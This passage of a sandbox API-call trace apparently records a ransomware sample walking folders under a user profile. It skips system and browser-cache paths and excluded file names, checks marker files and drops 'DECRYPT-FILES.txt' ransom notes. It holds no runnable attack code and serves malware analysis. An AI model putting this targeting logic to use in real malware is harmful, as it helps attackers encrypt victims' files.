HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\All Users") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="AhnLab") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.999] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0179.999] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.999] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\0a16c9.tmp") returned 87 [0179.999] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.002] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0180.002] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.002] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\DECRYPT-FILES.txt") returned 94 [0180.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.015] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0180.015] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0180.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee6b0660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee6b0660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.015] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee6b0660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee6b0660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.015] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee6b0660, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee6b0660, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee6b0660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.016] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.016] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.016] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.016] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.016] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.016] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0180.016] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.016] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0180.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\0a16c9.tmp" [0180.016] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.016] CloseHandle (hObject=0x0) returned 0 [0180.016] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.016] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="D5NTRC6R", cAlternateFileName="")) returned 1 [0180.016] lstrcmpW (lpString1="D5NTRC6R", lpString2=".") returned 1 [0180.016] lstrcmpW (lpString1="D5NTRC6R", lpString2="..") returned 1 [0180.017] lstrcatW (in: lpString1="D5NTRC6R", lpString2="\\" | out: lpString1="D5NTRC6R\\") returned="D5NTRC6R\\" [0180.017] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="D5NTRC6R\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\" [0180.017] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Program Files") returned 0x0 [0180.017] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch=":\\Windows") returned 0x0 [0180.017] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Games\\") returned 0x0 [0180.017] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\All Users") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="AhnLab") returned 0x0 [0180.062] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.062] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0180.062] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.062] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\\\0a16c9.tmp") returned 96 [0180.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.076] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0180.076] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.077] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\\\DECRYPT-FILES.txt") returned 103 [0180.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.082] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0180.082] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*" [0180.082] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xee748be0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee748be0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.082] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.082] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xee748be0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee748be0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.082] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.083] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.083] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee748be0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee748be0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee748be0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.083] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.083] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.083] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.083] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.083] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.083] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.083] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0180.083] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.083] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\" [0180.083] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\0a16c9.tmp" [0180.083] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.084] CloseHandle (hObject=0x0) returned 0 [0180.084] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.084] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.084] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.084] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.084] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.084] CloseHandle (hObject=0x27c) returned 1 [0180.084] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.084] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.084] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.084] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.084] CloseHandle (hObject=0x274) returned 1 [0180.084] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0a0520, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0a0520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0a0520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.084] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.084] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0a0520, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0a0520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0a0520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.084] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.085] CloseHandle (hObject=0x26c) returned 1 [0180.085] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Headlights", cAlternateFileName="HEADLI~1")) returned 1 [0180.085] lstrcmpW (lpString1="Headlights", lpString2=".") returned 1 [0180.085] lstrcmpW (lpString1="Headlights", lpString2="..") returned 1 [0180.085] lstrcatW (in: lpString1="Headlights", lpString2="\\" | out: lpString1="Headlights\\") returned="Headlights\\" [0180.085] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Headlights\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\" [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Program Files") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch=":\\Windows") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Games\\") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.085] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\", lpSrch="\\All Users") returned 0x0 [0180.085] StrStrW 